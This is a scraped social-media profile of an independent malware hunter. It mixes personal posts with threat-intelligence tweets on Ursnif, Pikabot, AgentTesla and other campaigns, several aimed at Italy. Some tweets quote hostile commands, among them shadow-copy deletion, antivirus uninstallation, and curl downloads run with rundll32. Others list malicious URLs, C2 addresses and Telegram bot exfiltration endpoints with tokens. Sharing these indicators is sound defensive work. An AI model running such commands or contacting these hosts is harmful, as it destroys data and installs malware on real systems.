JAMESWT Profile Banner
JAMESWT Profile
JAMESWT

@JAMESWT_MHT

35,434
Followers
427
Following
8,390
Media
49,802
Statuses

#Independent #Malware #Hunter #CyberSecurity #InfoSec

Joined August 2015
Don't wanna be here? Send us removal request.
Pinned Tweet
@JAMESWT_MHT
JAMESWT
3 days
#Acquarium update 06/24 😎
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
0
13
@JAMESWT_MHT
JAMESWT
7 months
⚠️This is #crazy ⚠️ We met the #Ursnif #Gang via chat after client infection 🔥
Tweet media one
Tweet media two
@JAMESWT_MHT
JAMESWT
7 months
@Agenzia_Entrate spam email 24/11/2024 EML>LNK>JS>url>script>EXE>url>fakePNG> > #remcosrat ❇️Samples ⚠️Urls 🌀AnyRun js 🌀AnyRun exe 1/2
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
4
16
9
54
249
@JAMESWT_MHT
JAMESWT
3 years
MY wife told me: This is a kitchen, not your xxx😤 malware office 😂😅🤣
Tweet media one
11
16
224
@JAMESWT_MHT
JAMESWT
3 years
Some #CVE -2021-40444 Samples uploaded to #Bazaar @abuse_ch 🔽 ⬆️
Tweet media one
5
68
136
@JAMESWT_MHT
JAMESWT
3 years
1 way to ruin a sysadmin's day 🤒🤕😭 Yes water hit @JAMESWT_MHT Fortunatly i lost only 1 backup ups Only old servers out of work from 2017 ended up under water The raised platform saved me and all VMware servers stayed online 💯👍
Tweet media one
Tweet media two
23
15
138
@JAMESWT_MHT
JAMESWT
4 years
Who is the crazy man that upload sample from VTI to AnyRun with apikey in clear? By the way .. thanks for the gift @malwrhunterteam @_operations6_ @Seifreed @anyrun_app @virustotal
Tweet media one
14
21
129
@JAMESWT_MHT
JAMESWT
7 years
My new #VMware #ESX Server #infrastructure 48 logical core 96 with HT 384 GB RAM 6 Terabyte storage 10 gigabit fibre channel Thanks @HP
Tweet media one
Tweet media two
Tweet media three
18
25
123
@JAMESWT_MHT
JAMESWT
7 years
on a very cold day, the wife calls her husband "the car does not start and on the dash appears the image of a man who is shitting" He: "send me a picture" She: "here's the picture ... " @malwrhunterteam @_operations6_
Tweet media one
2
38
116
@JAMESWT_MHT
JAMESWT
2 years
#Fake "Windows11 Installation Assistant" 👇 Run👇 > vssadmin delete shadows /all /quiet > wmic product where name="ESET Security" call uninstall /nointeractive > etc windows-11info13.[com/srv/info.php 🔆H/T @malwrhunterteam
Tweet media one
Tweet media two
4
54
112
@JAMESWT_MHT
JAMESWT
4 years
WTF 30600 tweets... 30600 malware samples? 😳🤔😵 About 2.000.000 processed all hand made from 2018. Since 2014 better not to tell you you could call the asylum 😂😂 I am a crazy dude 😜 @malwrhunterteam
Tweet media one
12
9
109
@JAMESWT_MHT
JAMESWT
1 year
Best Malware Hosting Providers
Tweet media one
7
34
108
@JAMESWT_MHT
JAMESWT
7 years
ALLRIGHTY! TIME TO DO SOME EVIL STUFF!!!!!!! @malwrhunterteam @BleepinComputer @demonslay335
Tweet media one
5
52
99
@JAMESWT_MHT
JAMESWT
9 months
#DarkGate too #italy reply to stolen email conversartion EML>Url>zip>lnk>url>vbs>url>bat>urls>autoit config Samples Urls Run Vbs Bat Graphs
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
32
95
@JAMESWT_MHT
JAMESWT
3 years
🎉🎉🎉Happy Birthday🎉🎉🎉 😅😅😅 @Jameswt_mht 😅😅😅 🎂🎂🎂🥂🥂🥂🎂🎂🎂 #cake #italy #handmade
Tweet media one
Tweet media two
16
2
91
@JAMESWT_MHT
JAMESWT
3 years
🎉🎉🎉🎉 WOW 🎉🎉🎉🎉 🍺 💐💐💐💐WAHOO💐💐💐💐 🍹 🎊🎊🎊 30K Followers 🎊🎊🎊 🍾 💖💖💖THANK YOU 💖💖💖
Tweet media one
12
4
88
@JAMESWT_MHT
JAMESWT
1 year
When Anti #rat sentinel protection seems to work but instead 🤣😅😂
3
15
87
@JAMESWT_MHT
JAMESWT
4 years
My little high-tech bag 😂😳😳😁🤣😜
Tweet media one
Tweet media two
Tweet media three
Tweet media four
9
3
83
@JAMESWT_MHT
JAMESWT
4 years
😱 O fuck I'm 40 years old today 😱
Tweet media one
37
2
84
@JAMESWT_MHT
JAMESWT
2 years
Very Interesting ⚠️ #italy ⚠️ Email>Pdf>Html>Iso>lnk>Dll Mentioned "Maybe #EnvyScout sample from #APT29 #NOBELIUM " Samples+EXTRA 👇🔽🔽👇 ⚠️hXXps://www.agencijazaregistraciju.rs/i.html ⚠️hXXps://www.agencijazaregistraciju.rs/t.php cc @csirt_it @AgidGov
Tweet media one
Tweet media two
Tweet media three
Tweet media four
@RedDrip7
RedDrip Team
2 years
Maybe #EnvyScout sample from #APT29 #NOBELIUM i.html 3aa44a7951ad95d02c426e9e2a174c2e Decret.iso 6228d15e3bb50adfa59c1bdf5f6ce9f0 Decret.lnk 59b5d262532dab929bbe56c90a0257d2 cmd: %windir%/system32/cmd.exe /c start HP2.exe HPScanApi.dll 6812031432039a89fa741e9338f8e887
Tweet media one
Tweet media two
1
13
38
1
32
79
@JAMESWT_MHT
JAMESWT
6 years
Hey ... 10.000 Follower ... WOW Thanks to all ... really @malwrhunterteam
Tweet media one
9
5
75
@JAMESWT_MHT
JAMESWT
3 years
My best photo shoot 😎 #landscape
Tweet media one
Tweet media two
Tweet media three
3
13
73
@JAMESWT_MHT
JAMESWT
5 years
I am 1 year older today :) :P
Tweet media one
23
2
74
@JAMESWT_MHT
JAMESWT
4 years
Do you remember this Sophos article? #Ragnar #Locker / #RagnarLocker I never found IoCs >Msi package/micro.VDI Yet i caught it @malwrhunterteam @guelfoweb @Arkbird_SOLG @VK_Intel @James_inthe_box
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
23
70
@JAMESWT_MHT
JAMESWT
3 years
Tweet media one
Tweet media two
0
29
68
@JAMESWT_MHT
JAMESWT
10 months
🧰 #Hunting 🧰 ⚠️ #ConnectWise #ScreenConnect Malicious IoCs (MD5 hashlist and C2 to blacklist) 🔥 C2 instance-*-relay[.]screenconnect[.]com *🔽 m73xwc gegn9m bj6uhc g15pic cmjrni ymp7rj cqc6tm whpfy0 q07bx4 Some Samples🔽
Tweet media one
Tweet media two
Tweet media three
3
19
66
@JAMESWT_MHT
JAMESWT
3 years
Tweet media one
0
24
64
@JAMESWT_MHT
JAMESWT
4 months
This is #pikabot #SMB \\85.195.115.]20\share
Tweet media one
Tweet media two
@doc_guard
DOCGuard - Detect Maldocs in Seconds!
4 months
🚨 Malicious Excel File Evaded All The AV Solutions 🚨 📌 VT Detection: 1 / 63 📁 Filename: FACILISFL.xlsx 🔐 MD5: 55514c649e5631548ca25f11de0e9eaa 🕵️‍♂️ IOCs: 85.195[.115.20 DOCGuard Report:
Tweet media one
Tweet media two
0
11
31
1
17
67
@JAMESWT_MHT
JAMESWT
1 year
#BRT spam email #italy spread #Ursnif #Gozi Email>Pdf>url>zip>js>url>dll Samples Url https://piopler[.com/assistenza https://piopler.[com/ C2 provaterta[.com
Tweet media one
Tweet media two
Tweet media three
Tweet media four
4
30
61
@JAMESWT_MHT
JAMESWT
1 year
#ursnif #gozi #italy build 250257 Email>pdf>url>zip>js>url>encoded js>url>DLL Samples @reecdeep da decodificare (JS) Url Zip/js vipbeed.]com/SERVICES second stage vipbeed].com/servizi dll https://vipbeed].com/ C2 twinean.]com
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
29
65
@JAMESWT_MHT
JAMESWT
2 years
Before and After... 🤩🤩🤩
Tweet media one
Tweet media two
6
6
64
@JAMESWT_MHT
JAMESWT
11 months
#intuit Invoice spam email #Italy spread #ursnif #gozi not confirmed EML>Pdf>Url>js>url>js>url>PEDLL> Samples Urls cc @1ZRR4H @felixw3000 @fumik0_ @58_158_177_102
Tweet media one
Tweet media two
Tweet media three
Tweet media four
4
23
65
@JAMESWT_MHT
JAMESWT
1 year
#Emotet Samples Urls
Tweet media one
Tweet media two
3
22
63
@JAMESWT_MHT
JAMESWT
1 year
#AgenziaEntrate spam email spread #ursnif #gozi build 250257 Email > pdf > url>zip>js>url>dll Samples Urls (geofenced ITA + IP Blacklist) Zip s://centraless].com/dettaglio Dll s://centraless.]com/ 91.215.85.]153 C2 swebbers.]com mainertin].com
Tweet media one
Tweet media two
Tweet media three
4
22
59
@JAMESWT_MHT
JAMESWT
3 years
@ShadowChasing1 Mentioned Samples Doc Html Cab #CobaltStrike Dll #opendir hidusi.]com/e8c76295a5f9acb7/ #C2 dodefoh.[com:443/ml.html joxinu.[com:443/hr.html > @Namecheap
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
28
61
@JAMESWT_MHT
JAMESWT
1 year
"Fattura XXX" spam email #italy spread #stealer #Strela #signed "12980215 Canada Inc." Payloads "Spanish language" Second Stage C2 91.215.85[.209/server.php cc @1ZRR4H
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
28
60
@JAMESWT_MHT
JAMESWT
9 months
1/2 #DarkGate update/fixed tag with C2 IP 😉
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
21
59
@JAMESWT_MHT
JAMESWT
1 year
H/T @pr0xylife Onenote sample > Bat > curl url > Dll geofenced ITA🔽 Url Run
Tweet media one
Tweet media two
Tweet media three
2
21
57
@JAMESWT_MHT
JAMESWT
10 days
#mustangpanda #apt samples collection updated cc @smica83
Tweet media one
@JAMESWT_MHT
JAMESWT
15 days
#mustangpanda #apt Initial sample thanks to @smica83 ❇️ 🔽
Tweet media one
0
7
20
0
20
60
@JAMESWT_MHT
JAMESWT
11 months
Il mio incubo avverato.. Per fortuna che c'era la pedana rialzata e che le cose a terra erano da smaltire Notare livello arancione sulla colonna Ultima foto cosa succede se sala l'acqua di più.. Infatti dopo ho spostato i servers esx dell'armadio nero hp ai piani alti 😬
Tweet media one
Tweet media two
Tweet media three
16
4
60
@JAMESWT_MHT
JAMESWT
3 years
Interesting #Stealer Loader Sample Drop payload from Dropped Samples H/T @malwrhunterteam
Tweet media one
Tweet media two
Tweet media three
3
28
59
@JAMESWT_MHT
JAMESWT
3 months
Too in #italy #WikiLoader - #TA544 #quickbooks "Invoice Reminder: Your payment to Allen&Overy LLP " EML>PDF>url>zip>js>js>dll ⚠️zip Url https[:]//infplaute[.]com/international-commercial ❇️Samples
Tweet media one
Tweet media two
Tweet media three
@Cryptolaemus1
Cryptolaemus
3 months
#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll wscript 03_07_2024.js wscript affiliated.js C:\Users\Admin\AppData\Local\Temp\npp.8.6.3.portable.x64\notepad.exe (sideload)👇 \npp.8.6.3.portable.x64\plugins\mimeTools.dll IOC's
Tweet media one
1
31
74
2
21
59
@JAMESWT_MHT
JAMESWT
9 months
#IcedID or #Darkgate ? in #italy reply to stolen email conversartion EML>url > .xll > curl > ? 🌟 https://pantherradio.]media/toq/?88085611 Xll curl -o c:\users\public\PM7zc0iWd.dat http://95.164.17.]59/ZIbr7/n7i >scab /k besogon728
Tweet media one
@Cryptolaemus1
Cryptolaemus
9 months
#IcedID - #TA577 - url > .xll > curl > .dll EXCEL.EXE Sr.xll cmd /c curl -o c:\users\public\9y.dat http://135.125.177.]95/syK/3IldTx rundll32 c:\users\public\9y.dat scab /k besogon728 Samples 👇 IOC's
Tweet media one
2
48
132
2
17
56
@JAMESWT_MHT
JAMESWT
6 months
"Promemoria: Fattura Elettronica da Consultare" EML>URL>ZIP>.lnk>JS>bitsadmin>AutoIT>script> Urls 63.151.28.34.bc[.googleusercontent.com/812800/test @test .it 0tuiwp.mariomanagement[.biz.id ? Samples Urls Run
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
18
58
@JAMESWT_MHT
JAMESWT
10 months
#booking spam email spread #AgentTesla / #Xworm ?? ☢️Pdf with "auto" password >Url https://booking-com-details].blogspot.com/ >js >Ps1>Url > http://pwhotelnew.blogspot[.com/atom.xml >Vbs 💥C2 allclop.duckdns].org 💼Samples 1/2
Tweet media one
Tweet media two
Tweet media three
5
19
58
@JAMESWT_MHT
JAMESWT
4 years
Honestly after 6 years I'm tired of dealing with certain cretinates and certain people. Today I am so annoyed that I would like to click shutdown. But I'm not a coward I don't like to give it to the bullies. So unfortunately I'm going to stay here, head down, do what I do best.
Tweet media one
8
4
58
@JAMESWT_MHT
JAMESWT
11 months
Mentioned Webshell/backdoor logout.php #Citrix Gateway VPN compromised via #CVE -2023-3519 Sample (tk @malwrhunterteam )
Tweet media one
@1ZRR4H
Germán Fernández
11 months
Citrix Gateway VPN compromised via CVE-2023-3519 (a critical unauthenticated RCE) shows evidence of exploitation on 7th July, 11 days before the official patch. The attackers exfiltrated the system configuration file to then probably use the Metasploit module called
Tweet media one
Tweet media two
Tweet media three
Tweet media four
10
236
616
0
18
55
@JAMESWT_MHT
JAMESWT
1 year
"BRT S.P.A. - Codice cliente 0XXXX (IDXXXX) spam email spread #ursnif #gozi #italy EML>Pdf>url>zip>js>url>dll Samples Domain s:/exeseria[.]com/ C2 s:/avas1ta.[com/in/login/ itwicenice[.com s://avas1t.[de/in/loginq/ cc @58_158_177_102 @felixw3000 @fumik0_
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
23
54
@JAMESWT_MHT
JAMESWT
2 years
#Interesting malware Exe > CertUtil>sysinternal procdump >Link > CertUtil / Curl / github etc Run 🔆 🔆 Samples 👇👇👇 H/T @malwrhunterteam
Tweet media one
Tweet media two
Tweet media three
2
17
53
@JAMESWT_MHT
JAMESWT
2 months
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
25
55
@JAMESWT_MHT
JAMESWT
3 years
Revealed The secret of the quality of pigs bred in Italy 😅😂🤣
4
7
54
@JAMESWT_MHT
JAMESWT
15 days
#fakeanydesk Payload is download from https://monkeybeta[.]com/build/AnyDesk-x86.msix backup copy https[:]//we[.]tl/t-7F4jbBBTw0
Tweet media one
@Intel_Ops_io
Intel-Ops
15 days
New impersonation domains for @anydesk and @NotionHQ delivering malicious MSI packages, likely via SEO poisoning: 45.93.20[.]93 - AS 57523 (Chang Way Tech Co. Ltd) amydlesk[.]com (0/93) notlilon[.]co (1/93) notliion[.]com (8/93)
Tweet media one
Tweet media two
2
16
52
4
16
55
@JAMESWT_MHT
JAMESWT
8 months
EML>LINK>URL>JS>url 1 url 2>Exe eachday.]com/u2z/9oa/m0t3hg0h8uyx www.roboticaeducativa].pe/za/ www.precisiongroupsa.]com/wsjdfghd/ > js > sduyvzep.]top/ *1.php?hash= *2.php?id= temp.]sh/bfseS/ruzxs.exe AnyRun Samples
Tweet media one
4
19
52
@JAMESWT_MHT
JAMESWT
2 years
#fakeapp #fakecrack Malware Collection Updated 👇👇👇 H/T @l205306 @idclickthat @ffforward
Tweet media one
0
16
50
@JAMESWT_MHT
JAMESWT
6 months
#booking spam email spread #AgentTesla > #Aggah Eml>pdf>js>urls>ps1>dll Samples Urls Run #xworm C2 cpabuzus.[duckdns[.org api.]telegram.]org/bot6407936943:AAEbwVgCBACnK7GYTzSa5oskTB62S51g10o/sendDocument
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
16
51
@JAMESWT_MHT
JAMESWT
6 months
#Pikabot #Italy from real stolen conversation EML>PDF>LNK>ZIP>JS>URLS>DLL via curl Samples Urls C2 check tweet from @reecdeep
Tweet media one
Tweet media two
Tweet media three
Tweet media four
@reecdeep
reecDeep
6 months
🔥 #Pikabot #malware #TA577 targets #Italy 🇮🇹 11-12-23 PDF>LNK>ZIP>JS>DLL 🔥c2 66.42.80.169:5631 154.38.184.5:9785 65.20.82.254:5243 65.20.98.24:13783 154.61.75.156:2078 31.220.96.162:2224 109.123.227.54:13785 109.123.227.50:13782 #infosec #CyberSecurity
Tweet media one
1
21
47
0
19
51
@JAMESWT_MHT
JAMESWT
2 years
TeamBot sample caught by @abuse_ch 👇👇👇 drop "only" 😱😱😱 #socelars #stealer #loader #rat #redline #amadey #ransomware etc Run
Tweet media one
2
22
50
@JAMESWT_MHT
JAMESWT
3 years
#DarkSide #ransomware #elf #64bit X86 #signed " RHM Ltd" Uploaded Some Samples to Bazaar 😉
Tweet media one
Tweet media two
1
26
51
@JAMESWT_MHT
JAMESWT
7 months
#booking spam spread #RedLineStealer Malicious Campaign that targering #Hotel EML xuxaemberlin funderbunkantonina briannagolladay @ gmail .com >LNK>URL>EXE ❇️Samples ⚠️Urls ⏬AnyRun 🎯C2 193.233.132].43
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
14
51
@JAMESWT_MHT
JAMESWT
2 years
#Qbot #Quakbot #Qakbot ??? Zip Xlsb Dll Zip Urls geofenced USA / Australia Dll urls /8643842914630250.dat 79.141.167.]194 74.119.194.]108 51.195.38.]36
Tweet media one
Tweet media two
4
19
50
@JAMESWT_MHT
JAMESWT
2 years
#Lazyscripter APT Collection Samples updated ✳️
Tweet media one
@ankit_anubhav
Ankit Anubhav
2 years
I was wondering why #Lazyscripter APT got their name. Maybe because they are using the same malware host since end 2020 which is still up? /hpsj.firewall-gateway.net/hpjs.php Attacks are reaching via maldoc seen during this new year (password 12345A)
Tweet media one
5
19
40
1
21
47
@JAMESWT_MHT
JAMESWT
7 months
"Booking. com Invoice " Eml>pdf>js>urls>config>dll> #stealer (agenttesla ? snakekeylogger?) ❇️Samples ⚠️Urls ⏬AnyRun ⚠️C2 s://api.[telegram.[org/bot6668004993:AAHeLIV9IZttpue_B8ou1npc8y-k3b-XNWI/sendDocument
Tweet media one
Tweet media two
Tweet media three
2
11
49
@JAMESWT_MHT
JAMESWT
1 year
#ursnif #gozi #agenziaentrate #italy 🪧Zip oknaoptima24.]ru/agenzia/b85d/ZgHQnr.php gapegape.]co.]za/agenzia/5d14/p6oHkk.php 📋SMB \\Agenzia\Informazion.exe 62.173.147.]35 - 36 📡C2 62.173.140].150 31.41.44].179 91.107.119].172 Samples👇
Tweet media one
Tweet media two
3
20
48
@JAMESWT_MHT
JAMESWT
9 months
"BOOKING" spam email spread #Arkei #Vidar #Stealer ☢️Sample ☣️Urls / C2 🌟Run cc @malwrhunterteam @James_inthe_box @reecdeep @viuleeenz
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
18
50
@JAMESWT_MHT
JAMESWT
1 year
#Pikabot - #TA577 - url > .js > ps > .dll too in #italy from stolen conversation from 2019 Samples Urls
Tweet media one
Tweet media two
1
24
49
@JAMESWT_MHT
JAMESWT
8 months
#IcedID ( #Bokbot ) > #KeyholeVNC => #CobaltStrike Spam Email Campaign Urls Samples Run C2s: skrechelres[.]com jerryposter[.]com jkbarmossen[.]com evinakortu[.]com hofsaalos[.]com 1/2
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
22
49
@JAMESWT_MHT
JAMESWT
11 months
#Italy hit by #AgenziaEntrate spam email spread #Spy #Mekotio ⚡️Samples 🌐Urls 🧰Run ⚠️C2 146.70.24].214
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
23
47
@JAMESWT_MHT
JAMESWT
4 years
I spoke With @malwrhunterteam about android / huawei own OS Etc etc About mobile phone We have come to this decision At least 1 week Battery autonomy without recharge Interchangeable battery 99% privacy 99% malware free No update no upgrade ⬇️⬇️⬇️
Tweet media one
Tweet media two
9
16
46
@JAMESWT_MHT
JAMESWT
1 year
#AgenziaEntrate spam email #Italy EML>pdf>url>zip>js>url>Dll spread #ursnif #gozi Botnet 5050 Build 250259 🧰Samples 🔕Urls ⚰️C2 njamma].com extra avas1ta.]com avas1t].de
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
16
46
@JAMESWT_MHT
JAMESWT
7 months
#booking spam email spread #RedLine Stealer ❇️Last Url pw 2023 ❇️Samples 🔄AnyRun ⚠️C2 212.113.116].63
Tweet media one
Tweet media two
Tweet media three
@JAMESWT_MHT
JAMESWT
7 months
#booking spam email spread #Vidar #Stealer Last Urls pw 2023 and 123456 Samples C2 steamcommunity[.com/profiles/76561199568528949 t.[me/secgoxrp 116.203.166.[75:2087 116.203.6[.243 195.201.251.[173
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
14
44
0
14
47
@JAMESWT_MHT
JAMESWT
10 months
Spam Email spread #FormBook 👑Xls 💥Url http://23.95.122[.94/600/isoHost.exe 🛡️Payload 🏃‍♂️Run
Tweet media one
Tweet media two
Tweet media three
1
13
46
@JAMESWT_MHT
JAMESWT
3 years
#Malware Collections 365 / 24/7 Online No blacklist No password Fast Download Unlimeted space cdn.discordapp[.com 😂🤣😝 🔽
Tweet media one
2
7
46
@JAMESWT_MHT
JAMESWT
11 months
#ursnif #gozi #loader from #intuit spam email EML>PDF >URL https:]//dybseta.]com/Special zip>js >URL https:]//dybseta.]com/MySelective 1 time from same IP #italy >js >URL https://cdn.discordapp.]com/attachments/1128612297611415575/1134154620168568862/iiis12211221.iso >DLL 1/2
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
18
47
@JAMESWT_MHT
JAMESWT
2 years
Tweet media one
2
9
46
@JAMESWT_MHT
JAMESWT
1 year
"URGENT: NEW ORDER 01-4291937" spam email spread #AgentTesla Doc >cve-2017-11882>Url 194.180.48[.59/obizx.exe >Exe Url Ip Relation Exfil SMTP maggie.hualingan @gmail ].com
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
19
48
@JAMESWT_MHT
JAMESWT
4 years
#Ransomware 34 #Thanos Genes VT from dttcodexgigas (Deloitte Argentina) ✳️1° Run ✳️2° Run ✅Genes ✅Sample cc @malwrhunterteam @demonslay335 @VK_Intel @sugimu_sec @Arkbird_SOLG
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
17
46
@JAMESWT_MHT
JAMESWT
5 months
#AgentTesla #booking EML>PDF>url>js>url>script>infection ❇️Samples 🔥Urls htlbackfeb-03-24.]com booking-c. booking-coms. htlfeb24. *blogspot[.com ⚠️C2 https://api.telegram.]org/... 🌀AnyRun
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
15
45
@JAMESWT_MHT
JAMESWT
1 year
H/T @pr0xylife bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf Samples (invoice in italian language) Url https://dl.dropboxusercontent.]com/s/861qj7y6d154i94/Edodvle.png?dl=0 #stealer #blackguard
Tweet media one
Tweet media two
Tweet media three
0
13
47
@JAMESWT_MHT
JAMESWT
3 years
Collaboration between FIN7 and the RYUK group, a Truesec Investigation
2
25
47
@JAMESWT_MHT
JAMESWT
3 years
Dear wife, kitchen yet is malware free 😚 "OK dear husband, then you deserve this handmade #cake "😘 OH your are my sweet love. Really 🥰
Tweet media one
Tweet media two
Tweet media three
@JAMESWT_MHT
JAMESWT
3 years
MY wife told me: This is a kitchen, not your xxx😤 malware office 😂😅🤣
Tweet media one
11
16
224
1
3
45
@JAMESWT_MHT
JAMESWT
4 months
Hunting some Samples #pikabot
Tweet media one
@reecdeep
reecDeep
4 months
⚠️TA577 starts spreading #Pikabot #malware eml>.zip>.html(link) html files with 0 detections on Virustotal and decoy latin words 🔥staging ip: 204.44.125.68 103.124.104.76 103.124.104.22 66.63.188.19 104.129.20.167 #infosecurity #CyberAttack
Tweet media one
Tweet media two
Tweet media three
7
18
86
1
9
46
@JAMESWT_MHT
JAMESWT
11 months
#StrelaStealer too today too in #italy via certutil Js 2401ec9ab6c8a2c5ebcfdd3542411ad6 > Bat > CertUtil TXT B9970D0652E0AE78DE4DEF9C6BCD3F69 > Dll 88FC768F1E1C86650A267C4C54C14607 ♨️🧰Run Samples will be uploaded to bazaar
Tweet media one
Tweet media two
2
24
47
@JAMESWT_MHT
JAMESWT
3 years
Samples related to #CVE -2021-41379 🔽 (uploading 8 samples thanks too to @malwrhunterteam ) 🔽
Tweet media one
@KorbenD_Intel
Keith KorbenD Wingo
3 years
"Talos has already detected malware samples in the wild that are attempting to take advantage of this vulnerability." @James_inthe_box @JAMESWT_MHT @malwrhunterteam @wdormann links to any of these on VT ?
1
4
19
0
16
45
@JAMESWT_MHT
JAMESWT
2 years
#Signed "Revo Security SRL" samples ✳️ #IcedID C2 hipnoguard.]com carpricegoods[.com H/T @malwrhunterteam
Tweet media one
4
21
43
@JAMESWT_MHT
JAMESWT
1 year
#ursnif #gozi Botnet 7702 Build250249 spam email campaign @Agenzia_Entrate @MISE_GOV themes Samples Zip/Url/Exe #SMB \ministro\finanz.exe 31.41.44.]153 62.173.138.]164 C2 62.173.138.]160 193.0.178.]141 31.41.44].122 cc @58_158_177_102 @reecdeep @fumik0_
Tweet media one
Tweet media two
Tweet media three
Tweet media four
4
14
44
@JAMESWT_MHT
JAMESWT
3 years
"Don't Fall for This Holiday Survey Fraud" spam email spread #Dridex Xlsb/Dll Dll Urls C2 51.68.138.]110:443 206.189.150.]190:8116 103.109.247.]10:10443 23.253.208.]162:9217
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
20
45
@JAMESWT_MHT
JAMESWT
10 months
"Purchase Inquiry" spread #AgentTesla Url>Tgz>Tar>Exe 700MB>Url config>AgentTesla Tgz 💼 💥Exe ☢️Exfil https://api[.telegram[.org/bot6503462629:AAG6XJ6CX5deEotovpNp08Xz7_3tVjS7OOE/sendDocument 🏃‍♂️Run
Tweet media one
Tweet media two
Tweet media three
1
18
46